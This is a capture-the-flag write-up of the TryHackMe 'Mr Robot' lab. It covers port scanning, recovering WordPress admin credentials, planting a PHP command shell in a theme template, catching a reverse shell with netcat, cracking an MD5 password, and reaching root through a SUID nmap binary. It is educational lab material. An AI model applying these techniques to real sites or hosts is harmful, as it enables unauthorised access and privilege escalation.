Mr Robot - wook413

#tryhackme #linux #medium ![[Pasted image 20250706144446.png]] --- # Information Gathering - Nmap I began with scanning all 65,535 TCP ports and found 3 open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:25 CDT Nmap scan report for 10.10.49.18 Host is up (0.13s latency). Not shown: 65532 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 43.94 seconds ``` Then performed another TCP scan against those open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sC -sV $IP -p 22,80,443 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:27 CDT Nmap scan report for 10.10.49.18 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 99:97:25:77:c6:12:be:fa:f9:64:1b:4c:d9:53:b7:f4 (RSA) | 256 1b:c1:70:cf:29:16:8f:2e:a1:92:2c:45:99:49:da:0e (ECDSA) |_ 256 1f:12:7e:03:e1:b9:54:fe:4b:1a:21:b0:d8:ae:6e:d7 (ED25519) 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-09-16T10:45:03 |_Not valid after: 2025-09-13T10:45:03 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds ``` UDP scan against top 1,000 ports revealed no open ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --min-rate 3000 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 12:32 CDT Nmap scan report for 10.10.49.18 Host is up (0.14s latency). Not shown: 997 open|filtered udp ports (no-response) PORT STATE SERVICE 22/udp closed ssh 80/udp closed http 443/udp closed https Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds ``` --- # Footprinting ##### Port 80 & 443 It appears both 80 and 443 show the same website below. ![[Pasted image 20250706123713.png]] `Gobuster` scan revealed several directories that we could explore to potentially find leads for exploitation. ![[Pasted image 20250706125244.png]] Most of the directories found by `Gobuster` were either empty or simply displayed a "Forbidden" message. Below are some of the directories that had something interesting at least. `/image` ![[Pasted image 20250706124828.png]] `/readme` ![[Pasted image 20250706124606.png]] `/robots` contained two pages that we can checkout. ![[Pasted image 20250706124529.png]] `/fsociety.dic` appears to be a wordlist, and based on the scroll, it looks to be quite extensive. ![[Pasted image 20250706130140.png]] `/key-1-of-3.txt` file appears to contain part of a hash. I couldn't identify the hash type, likely because it's incomplete. Based on the file name, it seems there are two more parts we need to find in order to crack it -- but that's just my assumption. ![[Pasted image 20250706130353.png]] ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ wget http://$IP/fsocity.dic -O robots_wordlist --2025-07-06 13:13:52-- http://10.10.49.18/fsocity.dic Connecting to 10.10.49.18:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7245381 (6.9M) [text/x-c] Saving to: ‘robots_wordlist’ robots_wordlist 100%[====================================================>] 6.91M 1.79MB/s in 4.7s 2025-07-06 13:13:57 (1.46 MB/s) - ‘robots_wordlist’ saved [7245381/7245381] ``` On the`/license` page, I used the inspector and found what appears to be some base64-encoded strings. I almost missed it because I usually just view the page source and move on--and this hash string didn't appear there. ![[Pasted image 20250706132427.png]] I base64-decoded what I found and got the plaintext string. ![[Pasted image 20250706133913.png]] # Export It turns out the plaintext I extracted from the encoded strings was a full set of credentials--both a username and a password--not just a password because I was able to log into the Wordpress dashboard with it. ![[Pasted image 20250706134519.png]] `elliot` is actually the administrator meaning we can probably create, modify, or delete files ![[Pasted image 20250706135709.png]] Under the `Appearance` tab -> select `Editor` and I chose `404 Template` to modify ![[Pasted image 20250706140241.png]] Before getting a reverse shell, I tested sending commands and checking for communication with a simple PHP one-liner. ![[Pasted image 20250706140712.png]] Upon navigating to `/wp-includes/themes/twentyfifteen/404.php?cmd=id`, I was able to see the value of `id` command. Now it's time for getting a reverse shell! ![[Pasted image 20250706141050.png]] Here's the payload I used. A very common reverse shell payload ![[Pasted image 20250706141242.png]] Got a reverse shell as `daemon`! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.49.18] 50926 /bin/sh: 0: can't access tty; job control turned off $ whoami daemon ``` # Lateral Movement & Privilege Escalation In `/home/robots`, there are two files: `key-2-of-3.txt` and `password.raw-md5`. The key file belongs to robot and only user `robot` can open the file. On the other hand, anyone can open the password file. ```bash daemon@ip-10-10-49-18:/home/robot$ ls -l total 8 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5 ``` It just simply contains user `robot`'s credentials with the MD5-hashed password ```bash daemon@ip-10-10-49-18:/home/robot$ cat password.raw-md5 robot:c3... ``` Because MD5 hash password is easily crackable, I used `crackstation.net` ![[Pasted image 20250706141751.png]] With the cracked hash password, I logged in as `robot`meaning now I can open the key file. ```bash daemon@ip-10-10-49-18:/home/robot$ su robot Password: $ whoami robot ``` Got the second key ```bash robot@ip-10-10-49-18:~$ cat key-2-of-3.txt 822c... ``` ##### robot > root While looking around the system, I saw `/usr/local/bin/nmap` binary has SUID bit set which is unusual. ```bash robot@ip-10-10-49-18:/tmp$ find / -type f -perm -4000 2>/dev/null /bin/umount /bin/mount /bin/su /usr/bin/passwd /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/bin/pkexec /usr/local/bin/nmap /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/dbus-1.0/dbus-daemon-launch-helper ``` We can do either of the following. I'm just going to follow the `Shell` method because it's slightly easier. ![[Pasted image 20250706143854.png]] ![[Pasted image 20250706144249.png]] Got a shell as `root` :) ```bash robot@ip-10-10-49-18:/tmp$ nmap --interactive Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !sh root@ip-10-10-49-18:/tmp# whoami root ``` Also got the last part of the key ```bash root@ip-10-10-49-18:/root# cat key-3-of-3.txt 047... ```